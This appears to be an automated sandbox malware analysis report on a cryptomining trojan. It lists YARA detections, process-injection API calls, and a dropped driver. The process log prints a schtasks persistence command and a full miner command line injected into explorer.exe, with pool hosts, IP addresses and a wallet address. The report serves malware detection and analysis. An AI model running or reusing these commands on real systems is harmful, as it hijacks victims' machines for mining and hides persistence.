              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFE1061_2_0000025F5EFFE106
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFE4D61_2_0000025F5EFFE4D6
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFE90E1_2_0000025F5EFFE90E
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFD4D21_2_0000025F5EFFD4D2
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EFFED6A1_2_0000025F5EFFED6A
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FFA36125E221_2_00007FFA36125E22
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FFA361250761_2_00007FFA36125076
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FE4D69_2_000002C94E2FE4D6
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FE1069_2_000002C94E2FE106
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FE90E9_2_000002C94E2FE90E
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FD4D29_2_000002C94E2FD4D2
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E2FED6A9_2_000002C94E2FED6A
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36149B749_2_00007FFA36149B74
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA361467BC9_2_00007FFA361467BC
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36145E229_2_00007FFA36145E22
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA361450769_2_00007FFA36145076
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA36144B799_2_00007FFA36144B79
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FE4D615_2_000002A7810FE4D6
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FE10615_2_000002A7810FE106
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FE90E15_2_000002A7810FE90E
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FD4D215_2_000002A7810FD4D2
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A7810FED6A15_2_000002A7810FED6A
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401D58 NtAllocateVirtualMemory,0_2_00401D58
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401D18 NtWriteVirtualMemory,0_2_00401D18
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_004019D8 NtCreateThreadEx,0_2_004019D8
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401D98 NtProtectVirtualMemory,0_2_00401D98
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00401C98 NtClose,0_2_00401C98
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_00007FFA3614A30E NtUnmapViewOfSection,9_2_00007FFA3614A30E
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401D58 NtAllocateVirtualMemory,13_2_00401D58
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401D18 NtWriteVirtualMemory,13_2_00401D18
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_004019D8 NtCreateThreadEx,13_2_004019D8
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401D98 NtProtectVirtualMemory,13_2_00401D98
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00401C98 NtClose,13_2_00401C98
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: pcNCraWcRk.exeVirustotal: Detection: 64%
              Source: pcNCraWcRk.exeMetadefender: Detection: 31%
              Source: pcNCraWcRk.exeReversingLabs: Detection: 81%
              Source: pcNCraWcRk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\pcNCraWcRk.exe 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 Jump to behavior
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
